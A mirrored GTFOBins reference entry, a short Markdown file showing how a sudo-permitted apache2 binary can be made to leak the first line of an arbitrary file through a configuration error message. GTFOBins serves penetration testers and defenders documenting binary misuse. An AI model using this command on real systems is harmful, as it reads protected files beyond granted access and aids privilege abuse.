mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-27 23:38:29 +01:00
9 lines
215 B
Markdown
9 lines
215 B
Markdown
|
---
|
||
|
description: This includes the file in the actual configuration file, the first line is leaked as an error message.
|
||
|
functions:
|
||
|
sudo:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
sudo apache2 -f $LFILE
|
||
|
---
|